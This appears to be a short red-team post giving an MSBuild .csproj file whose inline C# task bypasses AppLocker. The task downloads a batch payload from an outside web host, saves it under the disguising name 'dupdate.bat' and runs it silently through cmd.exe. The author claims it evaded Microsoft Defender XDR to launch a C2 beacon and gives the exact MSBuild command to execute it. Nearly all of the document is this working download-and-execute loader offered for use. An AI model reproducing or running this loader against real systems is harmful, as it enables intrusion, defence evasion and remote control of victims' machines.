This is useful in environments where AppLocker enforces a strict policy, blocking the execution of most binaries.
The following .csproj file allows you to fetch and execute a .bat or .exe file.
The .csproj file embeds a C# loader that fetches and runs shellcode or binary payloads. In testing, it bypassed Microsoft Defender XDR and launched my C2 beacon without issue.
Execute the .csproj with a command such as:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Users\USER\Desktop\test.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MSBuild">
<MSBuildTest />
</Target>
<UsingTask
TaskName="MSBuildTest"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using Microsoft.Build.Utilities;
public class MSBuildTest : Task
{
public override bool Execute()
{
byte[] shellcode;
// Use newer TLS protocols
ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;
using (var client = new WebClient())
{
client.BaseAddress = "https://website.com/static/";
shellcode = client.DownloadData("payload.bat");
}
// Save to temp file
string tempFilePath = Path.Combine(Path.GetTempPath(), "dupdate.bat");
File.WriteAllBytes(tempFilePath, shellcode);
// Execute batch file
Process process = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = "cmd.exe",
Arguments = "/c \"" + tempFilePath + "\"",
RedirectStandardOutput = true,
RedirectStandardError = true,
UseShellExecute = false,
CreateNoWindow = true
}
};
process.Start();
process.WaitForExit();
Console.WriteLine(process.StandardOutput.ReadToEnd());
Console.WriteLine(process.StandardError.ReadToEnd());
return process.ExitCode == 0;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>